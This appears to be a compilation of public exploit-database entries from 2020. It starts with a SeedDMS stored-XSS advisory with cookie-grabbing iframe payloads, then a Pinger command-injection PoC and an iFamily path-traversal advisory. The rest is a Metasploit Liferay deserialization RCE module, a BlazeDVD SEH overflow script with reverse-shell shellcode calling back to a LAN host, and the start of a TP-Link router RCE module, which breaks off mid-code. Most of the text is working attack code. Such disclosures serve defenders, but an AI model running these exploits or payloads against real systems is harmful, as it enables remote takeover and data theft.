with low privileged web-application user account and low user interaction.
For security demonstration or to reproduce the security web
vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Start your local webbrowser and tamper the http protocol session
2. Open the AddEvent.php and add a new event
3. Insert your script code test payload inside the Name or Comments path
4. Save or submit the entry with error
Note: Now the web and webdav log has captured the insert or erro
5. Now wait until the administrator previews in the log management the
web or webdav view function
6. Successful reproduce of the persistent web vulnerability!
PoC: Vulnerable Source (Log Management - View)
<pre>Apr 13 19:23:22 [info] admin (localhost) op.RemoveLog
?logname=20200413.log
Apr 13 19:29:53 [info] admin (localhost) op.AddEvent ?name="<iframe
src="evil.source" onload="alert(document.cookie)"></iframe>
&comment=<iframe src="evil.source"
onload="alert(document.cookie)"></iframe>&from=1586728800&to=1586815199
</pre>
PoC: Payload
>"<iframe%20src=evil.source%20onload=alert(document.cookie)></iframe>
--- PoC Session Logs (POST) ---
https://SeedDMS.localhost:8080/out/out.AddEvent.php
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=y
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2973
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
https://SeedDMS.localhost:8080/op/op.AddEvent.php
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 356
Origin: https://SeedDMS.localhost:8080
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.AddEvent.php
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
from=2020-04-13&to=2020-04-13
&name=>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&comment=>"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
-
POST: HTTP/1.1 302 Found
Server: Apache/2.4.25 (Debian)
Location: ../out/out.Calendar.php?mode=w&day=13&year=2020&month=04
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Note: Injection Point via Calender op.AddEvent Name & Comment
--- PoC Session Logs (GET) ---
https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=20200413.log
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 273
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
https://SeedDMS.localhost:8080/out/evil.source
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 302 Found
Server: Apache/2.4.25 (Debian)
Location: /out/out.ViewFolder.php
Content-Length: 0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Note: Execution Point via Log Management (AP) on Webdav View or Web View
Reference(s):
https://SeedDMS.localhost:8080/
https://SeedDMS.localhost:8080/op/op.AddEvent.php
https://SeedDMS.localhost:8080/out/out.ViewFolder.php
https://SeedDMS.localhost:8080/out/out.AddEvent.php
https://SeedDMS.localhost:8080/out/out.LogManagement.php
https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=
https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=
Solution - Fix & Patch:
=======================
1. Parse and escape the name and comment input field on transmit to sanitize
2. Filter and restrict the input field of the name and comments
parameter for special chars to prevent injects
3. Parse the output location of all web and webdav logfiles to prevent
the execution point
Security Risk:
==============
The security risk of the persistent cross site web vulnerabilities in
the seeddms web-application are estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
# Title: Pinger 1.0 - Remote Code Execution
# Date: 2020-04-13
# Author: Milad Karimi
# Vendor Homepage: https://github.com/wcchandler/pinger
# Software Link: https://github.com/wcchandler/pinger
# Tested on: windows 10 , firefox
# Version: 1.0
# CVE : N/A
================================================================================
Pinger 1.0 - Simple Pinging Webapp Remote Code Execution
================================================================================
# Vendor Homepage: https://github.com/wcchandler/pinger
# Software Link: https://github.com/wcchandler/pinger
# Date: 2020.04.13
# Author: Milad Karimi
# Tested on: windows 10 , firefox
# Version: 1.0
# CVE : N/A
================================================================================
# Description:
simple, easy to use jQuery frontend to php backend that pings various
devices and changes colors from green to red depending on if device is
up or down.
# PoC :
http://localhost/pinger/ping.php?ping=;echo '<?php phpinfo(); ?>' >info.php
http://localhost/pinger/ping.php?socket=;echo '<?php phpinfo(); ?>' >info.php
# Vulnerabile code:
if(isset($_GET['ping'])){
// if this is ever noticably slower, i'll pass it stuff when called
// change the good.xml to config.xml, good is what I use at $WORK
$xml = simplexml_load_file("config.xml");
//$xml = simplexml_load_file("good.xml");
if($_GET['ping'] == ""){
$host = "127.0.0.1";
}else{
$host = $_GET['ping'];
}
$out = trim(shell_exec('ping -n -q -c 1 -w '.$xml->backend->timeout
.' '.$host.' | grep received | awk \'{print $4}\''));
$id = str_replace('.','_',$host);
if(($out == "1") || ($out == "0")){
echo json_encode(array("id"=>"h$id","res"=>"$out"));
}else{
## if it returns nothing, assume network is messed up
echo json_encode(array("id"=>"h$id","res"=>"0"));
}
}
if(isset($_GET['socket'])){
$xml = simplexml_load_file("config.xml");
//$xml = simplexml_load_file("good.xml");
if($_GET['socket'] == ""){
$host = "127.0.0.1 80";
}else{
$host = str_replace(':',' ',$_GET['socket']);
}
$out = shell_exec('nc -v -z -w '.$xml->backend->timeout.' '.$host.' 2>&1');
$id = str_replace('.','_',$host);
$id = str_replace(' ','_',$id);
if(preg_match("/succeeded/",$out)){
echo json_encode(array("id"=>"h$id","res"=>"1"));
}else{
## if it returns nothing, assume network is messed up
echo json_encode(array("id"=>"h$id","res"=>"0"));
}
}
?>
# Title: File Transfer iFamily 2.1 - Directory Traversal
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Software Link: http://www.dedecms.com/products/dedecms/downloads/
# CVE: N/A
Document Title:
===============
File Transfer iFamily v2.1 - Directory Traversal Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2199
Release Date:
=============
2020-04-14
Vulnerability Laboratory ID (VL-ID):
====================================
2199
Common Vulnerability Scoring System:
====================================
7.1
Vulnerability Class:
====================
Directory- or Path-Traversal
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Send photos, videos and documents to other devices without Internet. A
complete application to exchange files
wirelessly between devices. It uses the Multipeer Connectivity Framework
to search and connect to available devices,
without the need of internet connection or any kind of server and database.
(Copy of the Homepage:
https://apps.apple.com/us/app/file-transfer-ifamily-files-photo-video-documents-wifi/id957971575
)
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a directory
traversal web vulnerability in the official File Transfer iFamily v2.1
ios mobile application.
Affected Product(s):
====================
DONG JOO CHO
Product: File Transfer iFamily v2.1 - iOS Mobile Web Application
Vulnerability Disclosure Timeline:
==================================
2020-04-14: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Pre auth - no privileges
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
A directory traversal web vulnerability has been discovered in the
official File Transfer iFamily v2.1 ios mobile application.
The vulnerability allows remote attackers to change the application path
in performed requests to compromise the local application
or file-system of a mobile device. Attackers are for example able to
request environment variables or a sensitive system path.
The directory-traversal web vulnerability is located in the main
application path request performed via GET method. Attackers are
able to request for example the local ./etc/ path of the web-server by
changing the local path in the performed request itself.
In a first request the attack changes the path, the host redirects to
complete the adress with "..". Then the attacker just
attaches a final slash to its request and the path can be accessed via
web-browser to download local files.
Exploitation of the directory traversal web vulnerability requires no
privileged web-application user account or user interaction.
Successful exploitation of the vulnerability results in information
leaking by unauthorized file access and mobile application compromise.
Proof of Concept (PoC):
=======================
The directory traversal vulnerability can be exploited by attackers with
access to the wifi interface in a local network without user interaction.
For security demonstration or to reproduce the security vulnerability
follow the provided information and steps below to continue.
PoC: Exploitation
http://localhost/../../../../../../../../../../../../../../../../../../../../../../
http://localhost//../
--- PoC Session Logs [GET]] ---
http://localhost/../../../../../../../../../../../../../../../../../../../../../../
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 2521
-
http://localhost../etc/
Host: localhost..
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
- add slash to correct host adress (/.././)
http://localhost/./
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
- Access granted
http://localhost/../../../../../../../../../../../../../../../../../../../../../../
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 2521
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a restriction of the visible and
accessable ./etc/ path in the app container.
Disallow path changes in the client-side get method requests and
validate them securely.
Security Risk:
==============
The security risk of the directory travsersal web vulnerability in the
ios mobile application is estimated as high.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Java::HTTP::ClassLoader
include Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(update_info(info,
'Name' => 'Liferay Portal Java Unmarshalling via JSONWS RCE',
'Description' => %q{
This module exploits a Java unmarshalling vulnerability via JSONWS in
Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1 GA2
to execute code as the Liferay user. Tested against 7.2.0 GA1.
},
'Author' => [
'Markus Wulftange', # Discovery
'Thomas Etrillard', # PoC
'wvu' # Module
],
'References' => [
['CVE', '2020-7961'],
['URL', 'https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html'],
['URL', 'https://www.synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html'],
['URL', 'https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271']
],
'DisclosureDate' => '2019-11-25', # Vendor advisory
'License' => MSF_LICENSE,
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Privileged' => false,
'Targets' => [
['Liferay Portal < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, 7.2.1 GA2', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => {'PAYLOAD' => 'java/meterpreter/reverse_tcp'},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
))
register_options([
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end
def check
# GET / response contains a Liferay-Portal header with version information
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
)
unless res
return CheckCode::Unknown('Target did not respond to check request.')
end
unless res.headers['Liferay-Portal']
return CheckCode::Unknown(
'Target did not respond with Liferay-Portal header.'
)
end
=begin
Building the Liferay-Portal header:
https://github.com/liferay/liferay-portal/blob/master/portal-kernel/src/com/liferay/portal/kernel/util/ReleaseInfo.java
Liferay-Portal header data:
https://github.com/liferay/liferay-portal/blob/master/release.properties
Example GET / response:
HTTP/1.1 200
[snip]
Liferay-Portal: Liferay Community Edition Portal 7.2.0 CE GA1 (Mueller / Build 7200 / June 4, 2019)
[snip]
=end
version, build = res.headers['Liferay-Portal'].scan(
/^Liferay.*Portal ([\d.]+.*GA\d+).*Build (\d+)/
).flatten
unless version && (build = Integer(build) rescue nil)
return CheckCode::Detected(
'Target did not respond with Liferay version and build.'
)
end
# XXX: Liferay versions older than 7.2.1 GA2 (build 7201) "may" be unpatched
if build < 7201
return CheckCode::Appears(
"Liferay #{version} MAY be a vulnerable version. Please verify."
)
end
CheckCode::Safe("Liferay #{version} is NOT a vulnerable version.")
end
def exploit
# NOTE: Automatic check is implemented by the AutoCheck mixin
super
# Start our HTTP server to provide remote classloading
@classloader_uri = start_service
unless @classloader_uri
fail_with(Failure::BadConfig, 'Could not start remote classloader server')
end
print_good("Started remote classloader server at #{@classloader_uri}")
# Send our remote classloader gadget to the target, triggering the vuln
send_request_gadget(
normalize_uri(target_uri.path, '/api/jsonws/expandocolumn/update-column'),
# Required POST parameters for /api/jsonws/expandocolumn/update-column:
# https://github.com/liferay/liferay-portal/blob/master/portal-impl/src/com/liferay/portlet/expando/service/impl/ExpandoColumnServiceImpl.java
'columnId' => rand(8..42), # Randomize for "evasion"
'name' => rand(8..42), # Randomize for "evasion"
'type' => rand(8..42) # Randomize for "evasion"
)
end
# Convenience method to send our gadget to a URI with desired POST params
def send_request_gadget(uri, vars_post = {})
print_status("Sending remote classloader gadget to #{full_uri(uri)}")
vars_post['+defaultData'] =
'com.mchange.v2.c3p0.WrapperConnectionPoolDataSource'
vars_post['defaultData.userOverridesAsString'] =
"HexAsciiSerializedMap:#{go_go_gadget.unpack1('H*')};"
send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' => vars_post
}, 0)
end
# Generate all marshalsec payloads for the Jackson marshaller:
# java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a
def go_go_gadget
# Implementation of the Jackson marshaller's C3P0WrapperConnPool gadget:
# https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/gadgets/C3P0WrapperConnPool.java
gadget = Rex::Text.decode_base64(
<<~EOF
rO0ABXNyAD1jb20ubWNoYW5nZS52Mi5uYW1pbmcuUmVmZXJlbmNlSW5kaXJlY3RvciRSZWZl
cmVuY2VTZXJpYWxpemVkYhmF0NEqwhMCAARMAAtjb250ZXh0TmFtZXQAE0xqYXZheC9uYW1p
bmcvTmFtZTtMAANlbnZ0ABVMamF2YS91dGlsL0hhc2h0YWJsZTtMAARuYW1lcQB+AAFMAAly
ZWZlcmVuY2V0ABhMamF2YXgvbmFtaW5nL1JlZmVyZW5jZTt4cHBwcHNyABZqYXZheC5uYW1p
bmcuUmVmZXJlbmNl6MaeoqjpjQkCAARMAAVhZGRyc3QAEkxqYXZhL3V0aWwvVmVjdG9yO0wA
DGNsYXNzRmFjdG9yeXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAFGNsYXNzRmFjdG9yeUxvY2F0
aW9ucQB+AAdMAAljbGFzc05hbWVxAH4AB3hwc3IAEGphdmEudXRpbC5WZWN0b3LZl31bgDuv
AQMAA0kAEWNhcGFjaXR5SW5jcmVtZW50SQAMZWxlbWVudENvdW50WwALZWxlbWVudERhdGF0
ABNbTGphdmEvbGFuZy9PYmplY3Q7eHAAAAAAAAAAAHVyABNbTGphdmEubGFuZy5PYmplY3Q7
kM5YnxBzKWwCAAB4cAAAAApwcHBwcHBwcHBweHQABEhBQ0t0AANUSEV0AAZQTEFORVQ=
EOF
)
# Replace length-prefixed placeholder strings with our own
gadget.sub!("\x00\x04HACK", packed_class_name)
gadget.sub!("\x00\x03THE", packed_classloader_uri)
gadget.sub("\x00\x06PLANET", packed_class_name)
end
# Convenience method to pack the classloader URI as a length-prefixed string
def packed_classloader_uri
"#{[@classloader_uri.length].pack('n')}#{@classloader_uri}"
end
end
# Exploit Title: BlazeDVD 7.0.2 - Buffer Overflow (SEH)
# Date: 2020-04-15
# Exploit Author: areyou1or0 <Busra Demir>
# Software Link: http://www.blazevideo.com/dvd-player/free-dvd-player.html
# Version: 7.0.2
# Tested on: Windows 7 Pro x86
#!/usr/bin/python
file = "exploit.plf"
offset ="A"*(612-4)
nseh = "\xeb\x1e\x90\x90"
seh = "\x34\x31\x02\x64"
nops = "\x90" * 24
# msfvenom -p windows/shell_reverse_tcp LHOST=3D192.168.8.121 LPORT=8888= -f python -e x86/alpha_mixed -b '\x00\x0a\x0d\xff'
shellcode = ""
shellcode += "\x89\xe2\xda\xcc\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37"
shellcode += "\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
shellcode += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
shellcode += "\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x69\x78\x4e\x62"
shellcode += "\x53\x30\x63\x30\x45\x50\x45\x30\x6f\x79\x7a\x45\x46"
shellcode += "\x51\x79\x50\x73\x54\x4c\x4b\x76\x30\x66\x50\x6e\x6b"
shellcode += "\x66\x32\x74\x4c\x6c\x4b\x51\x42\x72\x34\x4c\x4b\x34"
shellcode += "\x32\x31\x38\x76\x6f\x6c\x77\x61\x5a\x47\x56\x66\x51"
shellcode += "\x6b\x4f\x6e\x4c\x75\x6c\x65\x31\x33\x4c\x64\x42\x64"
shellcode += "\x6c\x31\x30\x5a\x61\x38\x4f\x64\x4d\x66\x61\x7a\x67"
shellcode += "\x49\x72\x6a\x52\x71\x42\x30\x57\x6c\x4b\x53\x62\x36"
shellcode += "\x70\x6e\x6b\x30\x4a\x45\x6c\x6c\x4b\x32\x6c\x37\x61"
shellcode += "\x43\x48\x6a\x43\x31\x58\x55\x51\x6b\x61\x32\x71\x4c"
shellcode += "\x4b\x33\x69\x47\x50\x75\x51\x6a\x73\x4c\x4b\x47\x39"
shellcode += "\x72\x38\x4d\x33\x56\x5a\x30\x49\x4e\x6b\x57\x44\x6c"
shellcode += "\x4b\x43\x31\x7a\x76\x55\x61\x79\x6f\x4e\x4c\x6a\x61"
shellcode += "\x78\x4f\x54\x4d\x33\x31\x58\x47\x54\x78\x59\x70\x44"
shellcode += "\x35\x6b\x46\x75\x53\x63\x4d\x48\x78\x75\x6b\x51\x6d"
shellcode += "\x46\x44\x74\x35\x6b\x54\x72\x78\x4c\x4b\x70\x58\x45"
shellcode += "\x74\x43\x31\x79\x43\x50\x66\x4c\x4b\x74\x4c\x32\x6b"
shellcode += "\x6e\x6b\x52\x78\x47\x6c\x46\x61\x69\x43\x6c\x4b\x47"
shellcode += "\x74\x6c\x4b\x37\x71\x4a\x70\x6d\x59\x30\x44\x46\x44"
shellcode += "\x44\x64\x33\x6b\x71\x4b\x65\x31\x43\x69\x71\x4a\x52"
shellcode += "\x71\x79\x6f\x69\x70\x51\x4f\x51\x4f\x51\x4a\x4c\x4b"
shellcode += "\x57\x62\x58\x6b\x4e\x6d\x63\x6d\x35\x38\x55\x63\x64"
shellcode += "\x72\x43\x30\x65\x50\x75\x38\x64\x37\x43\x43\x44\x72"
shellcode += "\x43\x6f\x42\x74\x52\x48\x50\x4c\x71\x67\x67\x56\x44"
shellcode += "\x47\x59\x6f\x69\x45\x68\x38\x7a\x30\x37\x71\x63\x30"
shellcode += "\x63\x30\x46\x49\x6f\x34\x71\x44\x42\x70\x32\x48\x56"
shellcode += "\x49\x6d\x50\x42\x4b\x57\x70\x69\x6f\x49\x45\x56\x30"
shellcode += "\x50\x50\x36\x30\x30\x50\x33\x70\x66\x30\x67\x30\x76"
shellcode += "\x30\x32\x48\x4a\x4a\x54\x4f\x39\x4f\x4d\x30\x39\x6f"
shellcode += "\x49\x45\x6e\x77\x42\x4a\x63\x35\x30\x68\x69\x50\x6e"
shellcode += "\x48\x46\x68\x61\x69\x62\x48\x34\x42\x63\x30\x65\x72"
shellcode += "\x6f\x48\x4f\x79\x4a\x46\x62\x4a\x46\x70\x52\x76\x52"
shellcode += "\x77\x65\x38\x4d\x49\x4d\x75\x71\x64\x70\x61\x4b\x4f"
shellcode += "\x58\x55\x4c\x45\x4f\x30\x34\x34\x54\x4c\x6b\x4f\x70"
shellcode += "\x4e\x34\x48\x63\x45\x5a\x4c\x42\x48\x6a\x50\x68\x35"
shellcode += "\x4c\x62\x32\x76\x39\x6f\x5a\x75\x63\x58\x61\x73\x32"
shellcode += "\x4d\x63\x54\x57\x70\x4f\x79\x38\x63\x52\x77\x73\x67"
shellcode += "\x62\x77\x30\x31\x7a\x56\x63\x5a\x67\x62\x71\x49\x33"
shellcode += "\x66\x79\x72\x59\x6d\x35\x36\x58\x47\x30\x44\x67\x54"
shellcode += "\x37\x4c\x75\x51\x46\x61\x6c\x4d\x37\x34\x64\x64\x66"
shellcode += "\x70\x7a\x66\x75\x50\x52\x64\x32\x74\x76\x30\x56\x36"
shellcode += "\x63\x66\x46\x36\x73\x76\x71\x46\x70\x4e\x30\x56\x76"
shellcode += "\x36\x51\x43\x51\x46\x50\x68\x71\x69\x48\x4c\x57\x4f"
shellcode += "\x6e\x66\x69\x6f\x6a\x75\x4b\x39\x79\x70\x42\x6e\x33"
shellcode += "\x66\x47\x36\x79\x6f\x36\x50\x53\x58\x76\x68\x4c\x47"
shellcode += "\x57\x6d\x31\x70\x59\x6f\x6a\x75\x4f\x4b\x6c\x30\x58"
shellcode += "\x35\x79\x32\x72\x76\x53\x58\x4f\x56\x6d\x45\x6f\x4d"
shellcode += "\x6d\x4d\x79\x6f\x4a\x75\x55\x6c\x34\x46\x31\x6c\x56"
shellcode += "\x6a\x4b\x30\x59\x6b\x6d\x30\x31\x65\x66\x65\x6d\x6b"
shellcode += "\x33\x77\x35\x43\x53\x42\x72\x4f\x50\x6a\x37\x70\x61"
shellcode += "\x43\x49\x6f\x68\x55\x41\x41"
buffer = offset + nseh + seh + nops + shellcode
f = open(file,'w')
f.write(buffer)
f.close()
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'openssl'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::EXE
include Msf::Exploit::Remote::Udp
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'TP-Link Archer A7/C7 Unauthenticated LAN Remote Code Execution',
'Description' => %q{
This module exploits a command injection vulnerability in the tdpServer daemon (/usr/bin/tdpServer), running on
the router TP-Link Archer A7/C7 (AC1750), hardware version 5, MIPS Architecture, firmware version 190726.
The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does
not need any authentication to abuse it. After exploitation, an attacker will be able to execute any command
as root, including downloading and executing a binary from another host.
This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro +
Radek Domanski).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module
'Radek Domanski <radek.domanski[at]gmail.com> @RabbitPro' # Vulnerability discovery and Metasploit module
],
'References' =>
[
[ 'URL', 'https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo'],
[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/lao_bomb/lao_bomb.md'],
[ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2019/lao_bomb.md'],
[ 'CVE', '2020-10882'],
[ 'CVE', '2020-10883'],
[ 'CVE', '2020-10884'],
[ 'ZDI', '20-334'],
[ 'ZDI', '20-335'],
[ 'ZDI', '20-336' ]
],
'Privileged' => true,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'Payload' => {},
'Stance' => Msf::Exploit::Stance::Aggressive,
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/mipsbe/shell_reverse_tcp',
'WfsDelay' => 15,
},
'Targets' =>
[
[ 'TP-Link Archer A7/C7 (AC1750) v5 (firmware 190726)',{} ]
],
'DisclosureDate' => "Mar 25 2020",
'DefaultTarget' => 0,
)
)
register_options(
[
Opt::RPORT(20002)
])
register_advanced_options(
[
OptInt.new('MAX_WAIT', [true, 'Number of seconds to wait for payload download', 15])
])
end
def check
begin
res = send_request_cgi({
'uri' => '/webpages/app.1564127413977.manifest',
'method' => 'GET',
'rport' => 80
})
if res && res.code == 200
return Exploit::CheckCode::Vulnerable
end
rescue ::Rex::ConnectionError
pass
end
